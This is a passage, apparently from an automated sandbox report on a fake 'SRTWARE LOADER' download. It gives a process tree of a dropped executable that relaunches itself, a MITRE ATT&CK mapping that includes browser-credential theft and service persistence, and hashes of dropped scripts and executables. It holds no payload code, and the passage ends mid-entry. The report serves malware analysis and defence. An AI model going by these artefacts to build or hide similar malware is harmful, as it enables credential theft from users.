  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2004,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
  2⤵
  PID:1496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:1
  2⤵
  PID:244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4476 /prefetch:1
  2⤵
  PID:1476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4636 /prefetch:8
  2⤵
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:8
  2⤵
  PID:4680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4900,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4652 /prefetch:8
  2⤵
  PID:5952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:8
  2⤵
  PID:5964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8
  2⤵
  PID:6288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4500,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3520 /prefetch:8
  2⤵
  PID:6372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:8
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5376,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5388 /prefetch:8
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5176,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:2
  2⤵
  PID:4412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5292,i,3937501984940537458,2671610670710385970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:1320

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6088

C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5928
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6020
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:6476
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:3364
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:1852
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:4992
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:1104
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:1108
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:5448
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:5472
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:6064
- - C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe
    "C:\ProgramData\bdgqvfkbuyec\cgubbeednxkm.exe"
    3⤵
    - Executes dropped EXE
    PID:5740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
558c4f0d35c811f472b4e4ddd57423ea

SHA1
c2acbbad90e7e9ef1651615fd5f9694e0df17232

SHA256
d1e844a24203858219cd6f0b14caebee358f3a29c52a644f559e71922c23d7dc

SHA512
c2308e588b08b7474b533572173d8338caf0d55b27aed2ab78b962d2dc815faba9c1463b6b7869eba5c2d51045e2b7346d55674b754759e34caf107e5d491ade

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
fb03b6238f3985ab34496a66ce6cdbf4

SHA1
0169db3ca0a0b26d3160f2b96eb1fb394f6c9fcf

SHA256
e1eb3200c50c49afeada20e44230ca84f0fa6b60b9cabb23412a32c69143ac4c

SHA512
8b657fa5cf610f9a59d8fa47304c233959dd9885f490bff9ee7272de160c38a596b7071af2ad2f77620fb6e93be37ca714e12b2bc202d410919137c93580c798

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0

Filesize
44KB

MD5
4c9bc503f29e27ce815435a1dece1ebb

SHA1
0d2598b7defa423cdafe9afe6b5a8d509d8da184

SHA256
4ff28763bd32112e462461d61ca1dfd6da06f82488d6ad33b5f9d37e78e99da2

SHA512
8abb8b971f3b7f034580e29656ed9874a70beab6541ebe705fbc503f52d5a3cb0e78b59f2b140271fb05e63a3b0e06d942cb2347d14dde1f91d26a54cf5a1ba8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
52e9804b943c1160929671e923f163d1

SHA1
00c01a5f050c3e5571fcf05d64cb1f65ffa9dce7

SHA256
e7d432e6ae41e916c0e46f9e89e487c08673a41b6a16f528849e196c6ef58a52

SHA512
1d0068890584d5ff068b965a845a8edc37632d6f122356723f5afecf3470a16aa13848ebc841845d5dfc7494b5e23fe181a006080f1574a2d15037a93cf5b0d3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2

Filesize
1.0MB

MD5
fc4f1b2e050728073850809bb54b96b8

SHA1
27ba123c6f81a4e19200bdc83062c40c3f994edd

SHA256
17a885cb781ab9b2631ba07afd60199ea3bf71c6a249385ff5d61dcbc7cb5523

SHA512
42e3c7d5984758d6caa2b3b555012b6f15273243b0db01c9f40dab2e07a07986fcb13c4fb1fb13f207fcd79ea35e6642ba6f536448551fc7a03c50742b167b28

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3

Filesize
4.0MB

MD5
cfa172a650b84b3abdbcc47097ea7b57

SHA1
5b45943b506c37225942826c102fcca6bb743847

SHA256
74581baa80a130006b3dd5628aa4845b20089bb80a5c5710c459e2708c95b038

SHA512
fd8626ec91e0b48a17bfe1bbf51ff8419717f631109ea2ca39b908dbc06d7628b4ff5d861bee7bc2070685c59a63c9c3759db1cb589299a0cf430a7d3b5dabfe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
12a35c65d7244d35976a1b2c6e09afc5

SHA1
39dc99994a2099bd90319a55508a68dc441a128b

SHA256
6da9b993dc32ff0cd092277489d6ed9513ef9830babd06e23e1174029f960987

SHA512
214a6fe430a4474c34c066a1c0433afef9a39497582cf871f9e52526fc2ff5a84f83a17ccad232d7551a9774618f9593343fa99fbe47d0b37921d4999430228e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bffb42c90efaec57447da9ed60f9af71

SHA1
d6848a379ede936a24e8792009acbf800e0e5ddb

SHA256
c90cd56dc58d0b69cc68b4c5aa2742f96f90bab73b2878f2822de189196555ef

SHA512
c5f0011618fa3b01de06535d52e76674407625a45599a98e1218910ae1ffa08fe75193f32cd185a120e90b2c38d13f5c04ba5eb61ba1bf9b8cb56a7bcfca9385

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
875a1ba3f228d0426f48f19fc4581fa8

SHA1
7e450433c015d2c0e5afe789089d7fa18d06e587

SHA256
d7d6ab21b6a5cd3dbd6e8b531d3a3f3a45c910df7bf0648c85940f3ffce5d321

SHA512
be4fc14d4e44ba34506b11b9486d3f895f71e903dc5c7c80d57c91b377e42b96baece6dcd4c94e2288b0d94b7a8667880da8879d3f053eb1246e5d3e2d3eceb3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0bd7f8b0f78ea1592c1f2df6f3d2e22f

SHA1
fdc8af8d9c70b50067279e6edbe231c01c84d9d8

SHA256
5f99bb62ed42b6ee47e0ff174f6c3cd462736d582dc5c59a34d651e3809000e3

SHA512
ae9d195174d55c3925aa3b48d4e2e3ccc1ae08d4109a4ecb523f65e40258b6760f712176c2e02888f9516fe0a0004691baa2d637ad3610f1e9ca4a24aca969ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
86e62478ce4d13b9a903fc6c4d0b4c7c

SHA1
5f0f36ea7d9dc3b23d132831460665a5e4e2b180

SHA256
37d3a7115bbb9c4e5224c58e80fbd6c1b631cd7f864cd617995357a6b7e3a3b5

SHA512
64d84214b330a5be95066b897db93347f434da0cde347cfa4c1c25e9e0a2d36747ccb6a1d0a43d99c169b0005902de26e580d2aa2b81afa0e6aacdff86a5ce79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
f47936bff86976d822a65b3a8f8f1e85

SHA1
9a0fe9c0a7b2b3889297d383df49de66d3a60546

SHA256
1a45fa051b32ac387008f83f29327c0f0a091e8e2bce6516c2ddde3029af053d

SHA512
75322565f9283e2be56e3520a96a6924cfc108ac68634a47f8121b7f83c2a5c6e02aed2afdd776527442d8041675e72b56eea109017dabe29040af9515f4627c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\e36a42ab-7249-4672-9742-be5541d54457.tmp

Filesize
9KB

MD5
a05500688af96bdb0a9a4c8b8207c9ff

SHA1
78eb15230821b338c9b3f3c961292c17be5c3a6f

SHA256
4fcf02d7603f9346917c6b2d14b07afe205ac6fbcc4a5ab3d1c70678d4a28670

SHA512
4bee3f9b6940affa29900a289dfb111fd5dff69394706dd8146a64e8553da4b8470871d9771cc461705e01679a5e32916d637fd23e46e336a6fba378b1647d98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
655b83fecf695bc4892b2269bf3e2f11

SHA1
e93706ae168dfdfe4e21b2aaeb31252ea572c6dd

SHA256
eca44e70de884a1f43f6c88cd1e94f9365cd7707192e113e21753ee2d9ac4cda

SHA512
6dedeb5d4df27dbe54582d6722729c0a02ea2d7063f41b7ec53f5e33ed434c4890d9de425b9053fc802ba51480703adaae99978b308d6961d1f5a2b9a59724fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

Filesize
264KB

MD5
3c2f8721a71b13b6ed73640fc1753942

SHA1
e938aff878d3710444cc02b54ab6dcec8b490071

SHA256
a591a37cf17e99c776b8bf3e11c2b7fa350f8a6a1e510461f6f758251866640b

SHA512
84070277505ef934e9ffb8d4d728110c50186dda2addbd245507b09a1d764c6d816110768b8297e3fe6463339ae3c7aa05a2482574eb9c9959400a6b2db48968

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

Filesize
4.0MB

MD5
ec3885675c341892efdc600e5799c65a

SHA1
b68910ac24169dcd08678ae1a281097c02460dff

SHA256
d9345fbff8a9b91c0f2f1e427e7c1095026c4071dd086261473fe958aa3761ff

SHA512
3e6f370a23a012a817ac79437dfdf02adf575f1d5e645648b66632b53a5de88180557889bb59bd50ef5b14100145e3e381135152c63b1c52d92ba3ae9baf1988

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
ef48733031b712ca7027624fff3ab208

SHA1
da4f3812e6afc4b90d2185f4709dfbb6b47714fa

SHA256
c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99

SHA512
ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
ec873a5d78804e207a5f8c2b6bd5e26b

SHA1
0eba551f180f22aabcf22d3edeb59660e3f346f0

SHA256
f51337a6ed8efb1a1bef2cad65b681b0013cac3bfdf1dc35c5ee00bd600cf824

SHA512
78f8855685070260c845a565c39ed2d04172091bac548c5743d08a16419c7786fb318f920e726ceb511e9a1224b6aec72521c7fe90e52083515fd12e2d18bd81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
77ead21bfe808a7b346e1d0e5408c8ca

SHA1
2a81cc4588249b703846112c140baea49bd2e1af

SHA256
53230bdfc844e7ec6a381505e73817a1300ed72fbec9c154d142af272f9b54e9

SHA512
acaa3e96dac5c4071ea48887f4ea50485fffb54ec2e154aa2a5be66787f2e55e97c0d8c54b1c6cf13119a637204f7fa6eae9177016a91aa5cf43b55e61fa05e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac4917a885cf6050b1a483e4bc4d2ea5

SHA1
b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

SHA256
e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

SHA512
092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ad14043b057bb036f8610136ff9781d3

SHA1
8c713ad9ad79d608f8364cf62db91c0fc8411e8e

SHA256
53f7e2a77a75dc8e8c695843f1caeeac0bb1a161855804e5d87aa260c7c0874d

SHA512
bc6ba7f4d26fb852801d36a1d3d729619c53d09bf5c659bca2a4c91ebfe5e0847ea74c6184a66f763cfe26ffa6806b0fcf4abf65c143c544bec62adab31b749f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2aa742a7d1294919a928dc2aae3d2d9f

SHA1
240fb8279e357bbe870f2862a589a5cb59e417fa

SHA256
6855f4a581249e37931a5278f2db062b092c7ef4f48dd739ba127946cf25dcb7

SHA512
fc855273a8565d6074f07c32d630e430640c1c950cce57a54e0fd1e4ad6ba5987b88c4ada7df742c2dba4cde957636b4aeec7f9dfc73cb46ea8e53460e867d4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6344564097353c8e7e68991fffa80d88

SHA1
2ac4d108a30ec3fbd2938b0563eb912415ea7c62

SHA256
d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da

SHA512
e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

Download Submit
C:\Users\Admin\AppData\Local\Temp\PpjsQcxxeW.bat

Filesize
201B

MD5
188dfee688bc6f1316720d31df6c19ec

SHA1
2316e85f6293d4c8a66c5851e017126de4ae7b8e

SHA256
2e86411b205eb5c375e2874fb53fd0ce1742334a7e8a85fd82c9fd7adf941aa7

SHA512
a779f108851a5c74619b52f3dcf6884de74b2c43138c067b5f404e1e920be72410d9f6dbf38d7e7ff7e4f44e170cedb3c5a263e5cff36e5f5f777676fc1f26e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jn5qt0sb.ubi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fconfig.scr

Filesize
2.5MB

MD5
d5ac30c01a54e7fae75152785d58b9b3

SHA1
1649f5c03f7192ac4fe12acff10bf20c7db3d888

SHA256
5f1afaf179c67b627c2e3490802970555be673d7dd25a1127525bd6797170ebf

SHA512
1a757bb721ab925c7b3ca54c8c0c2d07d4aeafc734d75c72ec4f1212e0f01f18695f1359f5d5b9c2612c6ec776257a4ded540f67874e418929c628e2fee92311

Download Submit
C:\Users\Admin\AppData\Local\Temp\msconfig32.scr

Filesize
1.5MB

MD5
97a0239545d493d0d37d4657f744bc5d

SHA1
4e8a38b1a3103b0890d787f5967ff215fd562865

SHA256
f1c65f1fcda53e169b5ed310aacfd3a392789692becb8c302f25abf3b55a0da8

SHA512
1dac84bbae50c22fd7ba1319485a5b14fd55f0a4db8d2b9686bf5453d20a87c6d41a14a26effdb542725887dd5282dc8b09e572ea87003e97877b9c42c69a93e

Download Submit
C:\Users\Admin\AppData\Local\Temp\network.scr

Filesize
137KB

MD5
7ebacc5c4867641f36393235dbbb8ad2

SHA1
6734d7dba237da649a9bcfec7f31214b14541e5c

SHA256
b24d5649c98caf5b66026aae73b449e351f0477907eb1b6923004c0f1ddaaa76

SHA512
44ceb1202c9bec0dd0c0ed32a8243b6f4943fbf4e798cf1c8965afb5ab4c6e262b447165ccc914fb21b478c3122d9ae66b2c23f90e8222582fc867262a558336

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir7056_1594355314\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir7056_1594355314\c3ddd989-98fb-4323-855d-d639eeefcac9.tmp

Filesize
132KB

MD5
da75bb05d10acc967eecaac040d3d733

SHA1
95c08e067df713af8992db113f7e9aec84f17181

SHA256
33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2

SHA512
56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

Download Submit
C:\Users\Admin\AppData\Roaming\chain\ERN1N4l2zRC4NwIMiOjL5mGz.vbe

Filesize
221B

MD5
fdb2f2e744b2ac03976836d879cb36a4

SHA1
f46911be439bddbc36cefe7f1d1d1ea909c1f8a6

SHA256
a1807a438a9507d425041ce32337fa23b866073997219bfdd6dd4c7751a6baba

SHA512
3aff1cba602876b99b2fadb0f3a960816b49b5e15c53300f25b5311a4471506a8c818f55519f48d85cdd777f234328cfd7575d2c5f19108a2ab3f7362cd91596

Download Submit
C:\Users\Admin\AppData\Roaming\chain\laWqYjhfpbW5VOiv6TSZGPQIPEdxgk.bat

Filesize
82B

MD5
1c34df8673e0e11536cad5da4ef1f0c9

SHA1
33746d285e574c9e322bde17b9f433f724bc9586

SHA256
fc149998267bf2cc32bc0f47423b35c2810881143c2007d06610161876cd881f

SHA512
933ca6c0914ecf34e6a8d1ec0876f2c55f35e364614cf879fb58c71b15e94702a8da46b76aa3c44f0434e8cfa52461c93be393c9ce91f4009565ac5172b56bed

Download Submit
C:\Users\Admin\AppData\Roaming\chain\msnbc.exe

Filesize
1.6MB

MD5
65e8fe2380e1fb5c24ccc11149ff80dc

SHA1
05d432bf9a41fed9c0dec7ad8e5d6b0c721652a6

SHA256
a048a3a6bb4fac880c41f5fbfba3d6379e55b55ea65ee7c95f959dec2014ad0c

SHA512
40a9cd403e59905e60139302bbdda498ce848755daeb8156a9634a235422cae18cef17094224a55ad342f9d90e0e9a3c5d6e9535438d2fb77cbf9c256eb096fc

Download Submit
C:\Users\Admin\Desktop\SRTWARE LOADER(12)\resources\d3d9.bin

Filesize
384KB

MD5
d15b01f8f9ca272e5cca42e8239fa5d8

SHA1
dab96081637452c518d5a700235cf0d83fadff12

SHA256
8da82182a551fcb019729068824f4c811a26f0db3fc2509540c0680fa76a9749

SHA512
f71da61a4d62227064e452cadf7fe6745d9501d0a159071773eac34b7eeda0c7215c074fd513db394dcefa72378dad7cae6c01c12fc2af1cad65ffdf7b0ecf76

Download Submit
C:\Users\Admin\Desktop\SRTWARE LOADER(12)\srtware loader.exe

Filesize
2.0MB

MD5
bf46ce4d79a8b92ca7bcd9d5812d9953

SHA1
2ee8548524b14ff778186a04f4d845c91165e9d7

SHA256
9938ba00ef26ff2e084cb062f4cc2ab5c85261fbddfe4a366fb3a2057e1b8098

SHA512
fba9cbf2e5c3eacacb55f6f947369a24205a92e7c6ea2f357050a20ef7768b242d53343a39dcaf3768955510e63b91096235e612b15687796ec63264c33a28b0

Download Submit
C:\Users\Admin\Desktop\SRTWARE LOADER(12)\srtware.exe

Filesize
407KB

MD5
e364a1bd0e0be70100779ff5389a78da

SHA1
